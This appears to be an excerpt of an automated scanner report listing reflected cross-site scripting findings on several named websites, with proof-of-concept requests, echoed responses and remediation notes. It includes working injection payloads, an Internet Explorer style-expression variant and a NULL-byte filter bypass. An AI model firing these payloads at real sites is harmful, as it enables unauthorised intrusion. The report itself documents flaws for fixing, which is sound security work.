The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ecef"><script>alert(1)</script>c72cf329bb7 was submitted in the utm_campaign parameter. This input was echoed as 1ecef\"><script>alert(1)</script>c72cf329bb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /white-paper/?id=95&A=marchex&O=HS&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial1ecef"><script>alert(1)</script>c72cf329bb7&utm_term=Toolbox HTTP/1.1 Host: hs.maas360.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 26 Jan 2011 14:56:01 GMT Server: Apache X-Powered-By: W3 Total Cache/0.8.5.2 X-Pingback: http://forum.maas360.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Link: <>; rel=shortlink Last-Modified: Wed, 26 Jan 2011 14:56:01 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14963
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fb94"><script>alert(1)</script>1de023c3ac0 was submitted in the utm_medium parameter. This input was echoed as 1fb94\"><script>alert(1)</script>1de023c3ac0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /white-paper/?id=95&A=marchex&O=HS&utm_source=marchex&utm_medium=cpc1fb94"><script>alert(1)</script>1de023c3ac0&utm_campaign=Financial&utm_term=Toolbox HTTP/1.1 Host: hs.maas360.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 26 Jan 2011 14:55:56 GMT Server: Apache X-Powered-By: W3 Total Cache/0.8.5.2 X-Pingback: http://forum.maas360.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Link: <>; rel=shortlink Last-Modified: Wed, 26 Jan 2011 14:55:56 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14963
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b7e8"><script>alert(1)</script>d8aa60128b1 was submitted in the utm_source parameter. This input was echoed as 3b7e8\"><script>alert(1)</script>d8aa60128b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /white-paper/?id=95&A=marchex&O=HS&utm_source=marchex3b7e8"><script>alert(1)</script>d8aa60128b1&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolbox HTTP/1.1 Host: hs.maas360.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 26 Jan 2011 14:55:54 GMT Server: Apache X-Powered-By: W3 Total Cache/0.8.5.2 X-Pingback: http://forum.maas360.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Link: <>; rel=shortlink Last-Modified: Wed, 26 Jan 2011 14:55:54 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14963
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of the utm_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db93f"><script>alert(1)</script>9bc17df5d49 was submitted in the utm_term parameter. This input was echoed as db93f\"><script>alert(1)</script>9bc17df5d49 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /white-paper/?id=95&A=marchex&O=HS&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolboxdb93f"><script>alert(1)</script>9bc17df5d49 HTTP/1.1 Host: hs.maas360.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 26 Jan 2011 14:56:03 GMT Server: Apache X-Powered-By: W3 Total Cache/0.8.5.2 X-Pingback: http://forum.maas360.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Link: <>; rel=shortlink Last-Modified: Wed, 26 Jan 2011 14:56:03 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14963
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
3.37. http://infor.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://infor.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6ec6"style%3d"x%3aexpression(alert(1))"0e278d69efd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d6ec6"style="x:expression(alert(1))"0e278d69efd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?d6ec6"style%3d"x%3aexpression(alert(1))"0e278d69efd=1 HTTP/1.1 Host: infor.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 54401 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=qoula355jchnl0am2e3e2i55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:08 GMT Connection: close
3.38. http://infor.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://infor.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14fe2'-alert(1)-'cfeea45fd7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?14fe2'-alert(1)-'cfeea45fd7b=1 HTTP/1.1 Host: infor.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 54286 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ww5znmesfgdrusjq50mcwm45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Infor Commu ...[SNIP]... der != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2finfor.ittoolbox.com%2fDefault.aspx%3f14fe2'-alert(1)-'cfeea45fd7b%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of the 306f2'-alert(1)-'2382eb5920b request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e98d'-alert(1)-'3c5ebd829e6 was submitted in the 306f2'-alert(1)-'2382eb5920b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=13e98d'-alert(1)-'3c5ebd829e6 HTTP/1.1 Host: it.toolbox.com Proxy-Connection: keep-alive Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26306f2'-alert(1)-'2382eb5920b%3d13e98d'-alert(1)-'3c5ebd829e6'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.40. http://it.toolbox.com/blogs/ppmtoday [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 608cc'-alert(1)-'435b0e52deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1&608cc'-alert(1)-'435b0e52deb=1 HTTP/1.1 Host: it.toolbox.com Proxy-Connection: keep-alive Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26306f2'-alert(1)-'2382eb5920b%3d1%26608cc'-alert(1)-'435b0e52deb%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.41. http://it.toolbox.com/blogs/ppmtoday/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2483'-alert(1)-'56ce208cc66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/?c2483'-alert(1)-'56ce208cc66=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63736 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26c2483'-alert(1)-'56ce208cc66%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c79b'-alert(1)-'bf6491b2e46 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/categories/6c79b'-alert(1)-'bf6491b2e46/2379 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 61385 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fcategories.aspx%3fslug%3dppmtoday%266c79b'-alert(1)-'bf6491b2e46%2f2379'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fd03'-alert(1)-'5edd216a3b5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/categories/2fd03'-alert(1)-'5edd216a3b5/1191 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 61383 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fcategories.aspx%3fslug%3dppmtoday%262fd03'-alert(1)-'5edd216a3b5%2f1191'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cb4b'-alert(1)-'b15eda6d188 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/categories/4cb4b'-alert(1)-'b15eda6d188/2765 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 61383 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fcategories.aspx%3fslug%3dppmtoday%264cb4b'-alert(1)-'b15eda6d188%2f2765'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ce90'-alert(1)-'1098153feb9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/categories/6ce90'-alert(1)-'1098153feb9/1192 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 61385 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fcategories.aspx%3fslug%3dppmtoday%266ce90'-alert(1)-'1098153feb9%2f1192'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80718'-alert(1)-'50bcf3adcd9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/categories/80718'-alert(1)-'50bcf3adcd9/1193 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 61383 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fcategories.aspx%3fslug%3dppmtoday%2680718'-alert(1)-'50bcf3adcd9%2f1193'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62752'-alert(1)-'917fbaa7ac8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/62752'-alert(1)-'917fbaa7ac8 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63838 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%2662752'-alert(1)-'917fbaa7ac8'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.48. http://it.toolbox.com/blogs/ppmtoday/change-origins-39674 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/change-origins-39674
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6adc7'-alert(1)-'c1d11b6e461 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/change-origins-39674?6adc7'-alert(1)-'c1d11b6e461=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68916 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:40 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:39 GMT Connection: close
